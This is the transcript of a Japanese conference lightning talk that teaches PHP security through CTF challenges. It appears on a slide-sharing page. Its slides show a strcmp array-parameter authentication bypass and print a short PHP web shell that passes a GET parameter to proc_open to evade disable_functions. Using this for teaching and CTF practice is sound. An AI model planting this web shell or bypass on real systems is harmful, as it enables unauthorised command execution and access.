Upgrade to Pro — share decks privately, control downloads, hide ads and more …

CTFで学ぶPHPセキュリティ

Avatar for Ryoto Saito Ryoto Saito
March 31, 2019
Programming
3
3.7k

 CTFで学ぶPHPセキュリティ

PHPerKaigi 2019
ルーキーズLT

Avatar for Ryoto Saito

Ryoto Saito

March 31, 2019
Tweet

More Decks by Ryoto Saito

See All by Ryoto Saito
コンテナ上シェル悪用の話とPure Bashでcurlが作れた話
Avatar for Ryoto Saito ryotosaito
2
520
シェル芸のせかい / the Shellgei World
Avatar for Ryoto Saito ryotosaito
2
1.4k

Other Decks in Programming

See All in Programming
Reactの歴史を振り返る
Avatar for つちのこ tutinoko
1
150
抽象化という思考のツール - 理解と活用 - / Abstraction-as-a-Tool-for-Thinking
Avatar for shin1x1 shin1x1
1
880
AI時代の『改訂新版 良いコード/悪いコードで学ぶ設計入門』 / ai-good-code-bad-code
Avatar for MinoDriven minodriven
24
10k
LLMは麻雀を知らなすぎるから俺が教育してやる
Avatar for po3rin po3rin
2
1.3k
No Install CMS戦略 〜 5年先を見据えたフロントエンド開発を考える / no_install_cms
Avatar for Masahiko Sakakibara rdlabo
0
380
コーディングエージェント概観(2025/07)
Avatar for Itsuki itsuki_t88
0
440
Prompt Engineeringの再定義「Context Engineering」とは
Avatar for ツルオカ htsuruo
0
110
TypeScriptでDXを上げろ! Hono編
Avatar for Yusuke Wada yusukebe
3
880
はじめてのWeb API体験 ー 飲食店検索アプリを作ろうー
Avatar for Aki Nakahara akinko_0915
0
180
0から始めるモジュラーモノリス-クリーンなモノリスを目指して
Avatar for sushi-cat sushi0120
0
170
プロダクトという一杯を作る - プロダクトチームが味の責任を持つまでの煮込み奮闘記
Avatar for 幡ヶ谷亭直吉 hiliteeternal
0
290
코딩 에이전트 체크리스트: Claude Code ver.
Avatar for nacyot nacyot
0
1k

Featured

See All Featured
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
Avatar for soudai sone soudai
PRO
181
54k
Done Done
Avatar for chrislema chrislema
184
16k
Writing Fast Ruby
Avatar for Erik Berlin sferik
628
62k
GraphQLとの向き合い方2022年版
Avatar for Yosuke Kurami quramy
49
14k
The Illustrated Children's Guide to Kubernetes
Avatar for Chris Short chrisshort
48
50k
The Art of Delivering Value - GDevCon NA Keynote
Avatar for David Neal reverentgeek
15
1.6k
Gamification - CAS2011
Avatar for David Bonilla davidbonilla
81
5.4k
Producing Creativity
Avatar for Steve Smith orderedlist
PRO
346
40k
Building Applications with DynamoDB
Avatar for Matt Wood mza
95
6.5k
Building Better People: How to give real-time feedback that sticks.
Avatar for Will Jessup wjessup
367
19k
Bootstrapping a Software Product
Avatar for Garrett Dimon garrettdimon
PRO
307
110k
Fashionably flexible responsive web design (full day workshop)
Avatar for Andy Clarke malarkey
407
66k

Transcript

  1. CTFで学ぶ PHPセキュリティ 2019/3/31 PHPerKaigi ルーキーズLT Ryoto (@systemctl_ryoto) 1

  2. CTF - Capture the Flag 2

  3. CTF Capture the Flag • FPSのゲームルール の1種 • 敵陣のフラッグを自陣 に持ち帰る

    • 由来は物理的な遊び • 転じて… 3

  4. CTF Capture the Flag • 情報セキュリティ的に脆弱な 「何か」が用意される • その脆弱性を突いてFlagを取得 する競技

    ※ Flag = 仮想的な機密文字列 flag{PHP_is_s3cur3!} ↑過去に本当に見たことあるやつ • 問題ベースで楽しくセキュリティ が勉強できる! • 徳丸さんの挑戦状もCTF 4

  5. PHPer チャレンジ は シェルを 奪えます ls -al /もmysqldumpも実行できる 5

  6. CTFの 主要な ジャンル 厳密な分類は大会やサイトによって 微妙に異なる 6 Pwn プログラムの脆弱性を突く Reverse リバースエンジニアリング

    Forensic パケットやFile systemなど Crypto 暗号解読 Web クライアントからサーバまで

  7. Webの CTF 情報セキュリティ的に脆弱な「何か」 • 「Webサイト」 • 「ソースコード」 どこが脆弱かはもちろん、どこにFlag があるのかがわからないことも たのしい謎解きの始まり

    7

  8. CTFのPHP問題例 - 実際の問題の一部分 - 8

  9. 前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)

    == 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 9

  10. 前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)

    == 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 10

  11. 言語仕様に関する問題 11

  12. 言語仕様に関する問題 12

  13. 言語仕様に関する問題 13 if (strcmp($_GET['password'], PASSWORD) == 0) strcmpは配列や関数などを受け取るとnull+Warningを返す) <?php var_dump($_GET);

    http://localhost/dump.php?password[]=admin にアクセス↓ array(1) { ["password"] => array(1) { [0] => string(5) "admin" } }

  14. include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==

    0) { echo FLAG; } 目標:なんとか突破したい! 先ほどのヒントを踏まえると… 言語仕様に関する問題 14

  15. include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==

    0) { echo FLAG; } 目標:なんとか突破したい! Ans: http://target.host/?password[]= 言語仕様に関する問題 15

  16. 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 <?php phpinfo(); disable_functions pcntl_exec, exec, popen, passthru, shell_exec, system

    目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行 16

  17. (注:shell_execと等価なので`cmd`はダメ) 任意コード実行 17

  18. pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 任意コード実行 18

  19. pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行

    19

  20. Ans. 以下のPHPファイルをアップロード <?php $cmd = $_GET['cmd'] $process = proc_open($cmd, [1=>["pipe",

    "w"]], $pipes); echo stream_get_contents($pipes[1]); これを1回アップロードすれば?cmd=...でやりたい放題 任意コード実行 20

  21. CTFに興味が湧いてきた人は! 21

  22. やってみよう! 22 常設CTF(Web・PHP問題が入門から充実している) • https://www.root-me.org/en/Challenges/Web-Server/ • http://websec.fr/ ※ 垢登録するときは捨てパスワードを使いましょう 慣れたらコンテストに参加!

    • https://ctftime.org

  23. 困ったときは 23 CTFでは解答例のことを Write-up と呼びます。 考えてもわからなかったら答えを探すのもあり! ("Write-up"で検索して問題を探す荒技もあり)

  24. Thank you! @systemctl_ryoto 24